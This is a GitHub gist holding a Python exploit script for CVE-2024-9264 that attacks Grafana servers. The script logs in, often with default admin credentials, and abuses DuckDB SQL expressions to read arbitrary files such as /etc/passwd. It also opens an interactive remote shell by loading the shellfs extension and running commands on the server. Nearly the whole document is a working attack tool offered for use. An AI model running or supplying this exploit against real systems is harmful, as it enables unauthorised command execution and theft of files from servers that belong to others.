Created
May 19, 2025 15:29
-
-
Save henriquetorquato/cf57586d8a8f85aede76b99d62f8896d to your computer and use it in GitHub Desktop.
CVE-2024-9264 - Interactive Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# This code is heavily based (literally copied) from: | |
# https://github.com/nollium/CVE-2024-9264/tree/main | |
# | |
# - Requirements (install with pip): | |
# ten | |
# psycopg2-binary | |
from ten import * | |
from tenlib.flow.console import get_console | |
from typing import cast, List, Dict, Optional, Any | |
from psycopg2.extensions import adapt | |
import sys | |
# Force ten to output to stderr so the user can redirect the file output separately from the message log | |
# E.g: python3 CVE-2024-9264.py -f /etc/passwd http://localhost:3000 > file.txt 2> logs.txt | |
console = get_console() | |
console.stderr = True | |
@inform("Logging in with provided or default credentials") | |
def authenticate(session: ScopedSession, user: str, password: str) -> None: | |
path = "/login" | |
data = {"password": password, "user": user} | |
res = session.post(path, json=data) | |
msg = res.json()["message"] | |
if msg == "Logged in": | |
msg_success(f"Logged in as {user}:{password}") | |
else: | |
failure(f"Failed to log in as {user}:{password}") | |
@inform("Running duckdb query") | |
def run_query(session: ScopedSession, query: str) -> Optional[List[Any]]: | |
path = "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101" | |
data = { | |
"from": "1729313027261", | |
"queries": [ | |
{ | |
"datasource": { | |
"name": "Expression", | |
"type": "__expr__", | |
"uid": "__expr__", | |
}, | |
"expression": query, | |
"hide": False, | |
"refId": "B", | |
"type": "sql", | |
"window": "", | |
} | |
], | |
"to": "1729334627261", | |
} | |
res = session.post(path, json=data) | |
data = cast(Dict, res.json()) | |
# Check for DuckDB not found error | |
if "results" in data and "B" in data["results"]: | |
result = data["results"]["B"] | |
if "error" in result and "no such file or directory" in result["error"]: | |
failure("DuckDB is not installed on the target system. This exploit requires DuckDB to be present in the system PATH.") | |
return None | |
if data.get("message"): | |
msg_failure("Received unexpected response:") | |
msg_failure(json.encode(data, indent=4)) # prettify json | |
return None | |
try: | |
values = data["results"]["B"]["frames"][0]["data"]["values"] | |
values = cast(List, values) | |
if len(values) == 0: | |
failure("File not found") | |
return None | |
return values | |
except (KeyError, IndexError): | |
msg_failure("Unexpected response format:") | |
msg_failure(json.encode(data, indent=4)) | |
return None | |
# Output's non-printable characters are unicode escaped | |
def decode_output(values: List[str]) -> bytes: | |
content = values[0][0] | |
decoded = content.encode("utf-8").decode("unicode_escape").encode("latin1") | |
return decoded | |
def read_remote_file(session: ScopedSession, filepath: str) -> Optional[bytes]: | |
"""Read a file from the remote server using read_blob.""" | |
escaped_filename = adapt(filepath) | |
query = f"SELECT content FROM read_blob({escaped_filename})" | |
result = run_query(session, query) | |
if result: | |
return decode_output(result) | |
return None | |
def execute_command(session: ScopedSession, command: str) -> Optional[bytes]: | |
"""Execute a command and return its output using shellfs.""" | |
tmp_file = "/tmp/grafana_cmd_output" | |
# Install and load shellfs if not already loaded | |
full_query = ( | |
"SELECT 1;" | |
"install shellfs from community;" | |
"LOAD shellfs;" | |
f"SELECT * FROM read_csv('{command} >{tmp_file} 2>&1 |')" | |
) | |
# Execute command and redirect output to a temporary file | |
run_query(session, full_query) | |
# Read the output file using the common function | |
return read_remote_file(session, tmp_file) | |
@entry | |
@arg("url", "URL of the Grafana instance to exploit") | |
@arg("user", "Username to log in as, defaults to 'admin'") | |
@arg("password", "Password used to log in, defaults to 'admin'") | |
def main(url, user="admin", password="admin", file=None, query=None, command=None): | |
session = ScopedSession(base_url=url.rstrip('/')) | |
authenticate(session, user, password) | |
while True: | |
try: | |
command = input("$ ").strip() | |
except EOFError: | |
print() | |
break | |
if not command: | |
continue | |
if command.lower() == ["exit"]: | |
break | |
output = execute_command(session, command) | |
bin_print(output) | |
# pylint: disable=no-value-for-parameter | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment